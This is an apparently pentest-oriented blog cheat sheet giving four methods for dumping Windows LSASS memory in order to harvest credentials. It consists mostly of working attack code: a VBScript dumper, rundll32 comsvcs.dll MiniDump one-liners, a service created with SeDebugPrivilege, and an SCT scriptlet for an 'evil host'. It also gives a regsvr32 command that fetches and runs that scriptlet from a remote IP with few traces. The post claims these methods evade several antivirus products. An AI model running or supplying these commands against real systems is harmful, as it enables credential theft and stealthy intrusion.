Windows Memory Dump Cheatsheet

ismail kaleem
2 min readJan 7, 2020

--

Procdump is painful as most AV software now catches it.

The below cheat-sheet can be useful during memory forensics or pentests!

Method#1 — Using CSCRIPT

Since neither rundll32 nor comsvcs!MiniDumpW will enable the debugging privilege required to access lsass.exe, the following VBscript will work in an elevated process.

Option ExplicitConst SW_HIDE = 0If (WScript.Arguments.Count <> 1) Then
WScript.StdOut.WriteLine("procdump - Copyright (c) 2019 odzhan")
WScript.StdOut.WriteLine("Usage: procdump <process>")
WScript.Quit
Else
Dim fso, svc, list, proc, startup, cfg, pid, str, cmd, query, dmp

' get process id or name
pid = WScript.Arguments(0)

' connect with debug privilege
Set fso = CreateObject("Scripting.FileSystemObject")
Set svc = GetObject("WINMGMTS:{impersonationLevel=impersonate, (Debug)}")

' if not a number
If(Not IsNumeric(pid)) Then
query = "Name"
Else
query = "ProcessId"
End If

' try find it
Set list = svc.ExecQuery("SELECT * From Win32_Process Where " & _
query & " = '" & pid & "'")

If (list.Count = 0) Then
WScript.StdOut.WriteLine("Can't find active process : " & pid)
WScript.Quit()
End If
For Each proc in list
pid = proc.ProcessId
str = proc.Name
Exit For
Next
dmp = fso.GetBaseName(str) & ".bin"

' if dump file already exists, try to remove it
If(fso.FileExists(dmp)) Then
WScript.StdOut.WriteLine("Removing " & dmp)
fso.DeleteFile(dmp)
End If

WScript.StdOut.WriteLine("Attempting to dump memory from " & _
str & ":" & pid & " to " & dmp)

Set proc = svc.Get("Win32_Process")
Set startup = svc.Get("Win32_ProcessStartup")
Set cfg = startup.SpawnInstance_
cfg.ShowWindow = SW_HIDE
cmd = "rundll32 C:\windows\system32\comsvcs.dll, MiniDump " & _
pid & " " & fso.GetAbsolutePathName(".") & "\" & _
dmp & " full"

Call proc.Create (cmd, null, cfg, pid)

' sleep for a second
Wscript.Sleep(1000)

If(fso.FileExists(dmp)) Then
WScript.StdOut.WriteLine("Memory saved to " & dmp)
Else
WScript.StdOut.WriteLine("Something went wrong.")
End If
End If

Run from elevated cmd prompt.

Most EDR will still not allow to do this

Method#2 — Using Powershell or CMD

Powershell -c rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump [process ID of process.exe] dump.bin full

Bypasses some common antiviruses such as Sophos Antivirus, KAV etc.

Method #3 — Using SC

Administrative users can use the Windows Service Control to create a service that runs our command, assign debug privileges to that service, and then run it. The following commands can be run from an elevated command prompt to create a MiniDump of LSASS:

  • sc create test binpath=”rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump [process ID of process.exe] dump.bin full”
  • sc privs test SeDebugPrivilege
  • sc start test

Method #4 — Using regsvr32

The sct script to be hosted on your evil host.

Remember to change the <procid>

<?XML version=”1.0"?>
<scriptlet>
<registration
progid=”Pentest”
classid=”{F0001111–0000–0000–0000–0000FEEDACDC}” >
<script language=”JScript”>

<![CDATA[
var r = new ActiveXObject(“WScript.Shell”).Run(“cmd /k Powershell -c rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump <procid> lsadump.bin full”);
]]>

</script>
</registration>
</scriptlet>

This could go totally fileless by applying /i as a URL leaving little traces. Windows event viewer would just indicate wscript.exe was executed.

regsvr32 /s /n /u /i:http://192.168.200.200/dumper.sct scrobj.dll

--

--

No responses yet